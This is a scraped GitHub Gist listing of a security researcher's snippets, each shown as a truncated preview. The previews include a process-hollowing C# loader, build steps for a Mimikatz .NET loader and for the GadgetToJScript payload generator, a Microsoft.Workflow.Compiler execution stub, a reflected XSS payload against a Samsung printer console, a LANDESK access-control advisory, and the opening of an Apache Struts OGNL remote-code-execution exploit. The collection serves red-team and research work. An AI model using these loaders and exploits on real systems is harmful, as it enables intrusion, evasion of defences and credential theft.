
Mohamed El Azaar med0x2e

@med0x2e
med0x2e / process-hollowing.cs
Last active Mar 28, 2021
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
View process-hollowing.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
@med0x2e
med0x2e / steps.txt
Last active Apr 16, 2021
Steps to run GadgetToJScript on linux (wine)
View steps.txt
Steps:
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
View Steps.txt
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. Use @pljoel's katz.cs file: uncomment the build lines in Delivery.Program.Main() and comment out the Exec() line of code.
4. Build it to generate file.b64, copy its content and replace the Package.file string in the payload.txt file.
6. Make sure the payloadPath variable is properly set in "TestAssemblyLoader.cs"
View gist:2715d32602ba688ea3bc239a3d5f8214
[Suggested description]
The web console of the Samsung printer model "SCX-824" is vulnerable to
a reflected Cross-Site Scripting (XSS) vulnerability, which can be
triggered by using the "print from file" feature, which forwards the
user to the following URL:
"http://<PRINTER_IP>/sws/swsAlert.sws?popupid=successMsg&type=alert&bullet=suc&func=&Nfunc=closePopup("successMsg","","")&flag=&frame=&msg="/><script>alert('XSS');</script>
The vulnerable parameter "msg" is not properly encoded before being interpreted as HTML/JS.
------------------------------------------
View sct.png
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
@med0x2e
med0x2e / compiler-input-obj.xml
Last active Aug 28, 2018
CompilerInput Object
View compiler-input-obj.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>result.xml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">
<d3p1:anyType xmlns:d4p1="http://www.w3.org/2001/XMLSchema" i:type="d4p1:string">C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll</d3p1:anyType>
</assemblyNames>
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@med0x2e
med0x2e / katz.whatever
Last active Apr 30, 2021
Mimikatz .NET Loader
View katz.whatever
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Workflow.Activities;
public class KatzWFCompiler : SequentialWorkflowActivity
{
public KatzWFCompiler()
@med0x2e
med0x2e / CVE-2017-11463
Last active Dec 15, 2017
CVE-2017-11463
View CVE-2017-11463
[Suggested description]
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted
Direct Object Reference leads to referencing/updating objects
belonging to other users. In other words, a normal user
can send requests to a specific URI with the
target user's username in an HTTP payload in order to retrieve a
key/token and use it to access/update objects belonging to other
users. Such objects could be user profiles, tickets, incidents, etc.
------------------------------------------
[Additional Information]
View struts0Exploit.py
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."